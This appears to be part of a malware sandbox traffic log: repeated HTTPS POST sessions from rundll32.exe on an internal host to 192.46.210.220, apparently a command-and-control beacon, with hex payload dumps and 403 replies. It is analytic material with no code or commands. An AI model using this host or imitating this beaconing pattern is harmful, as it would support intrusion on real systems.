                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
18          192.168.2.5  49822        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:33 UTC  89                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:33 UTC  89                  OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:34 UTC  94                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:34 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
19          192.168.2.5  49829        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:37 UTC  94                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:37 UTC  94                  OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:38 UTC  104                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:38 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.5  49759        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:01 UTC  9                   OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:01 UTC  10                  OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:02 UTC  14                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:02 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
20          192.168.2.5  49830        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:37 UTC  99                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:37 UTC  99                  OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:38 UTC  104                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:38 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
21          192.168.2.5  49837        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:41 UTC  104                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:41 UTC  104                 OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:41 UTC  114                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:41 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
22          192.168.2.5  49839        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:41 UTC  109                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:41 UTC  109                 OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:42 UTC  114                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:42 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
23          192.168.2.5  49849        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:45 UTC  114                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:45 UTC  114                 OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:45 UTC  124                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:45 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
24          192.168.2.5  49850        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:45 UTC  119                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:45 UTC  119                 OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:46 UTC  124                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:46 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
25          192.168.2.5  49857        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:48 UTC  124                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:48 UTC  124                 OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:49 UTC  133                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:49 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
26          192.168.2.5  49858        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:49 UTC  129                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:49 UTC  129                 OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:50 UTC  134                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:49 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
27          192.168.2.5  49870        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:52 UTC  134                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:51:52 UTC  134                 OUT        Data Raw: (hex dump omitted)
2021-10-28 02:51:53 UTC  143                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:51:53 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
28          192.168.2.5  49871        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:51:53 UTC  139                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:53 UTC139OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:53 UTC144INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.5 | 49879 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:51:56 UTC | 144 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:51:56 UTC | 144 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:57 UTC | 153 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:51:57 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49764 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:51:05 UTC | 14 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:51:05 UTC | 15 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:05 UTC | 19 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:51:05 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.5 | 49880 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:51:57 UTC | 149 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:51:57 UTC | 149 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:57 UTC | 153 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:51:57 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.5 | 49888 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:00 UTC | 154 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:00 UTC | 154 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:01 UTC | 163 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:01 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.5 | 49889 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:00 UTC | 158 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:00 UTC | 159 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:01 UTC | 163 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:01 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.5 | 49896 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:04 UTC | 164 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:04 UTC | 164 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:05 UTC | 173 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:05 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.2.5 | 49897 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:04 UTC | 168 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:04 UTC | 168 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:05 UTC | 173 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:05 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.5 | 49904 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:08 UTC | 174 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:08 UTC | 174 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:08 UTC | 183 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:08 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.5 | 49905 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:08 UTC | 178 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:08 UTC | 178 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:09 UTC | 183 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:09 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.5 | 49912 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:12 UTC | 183 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
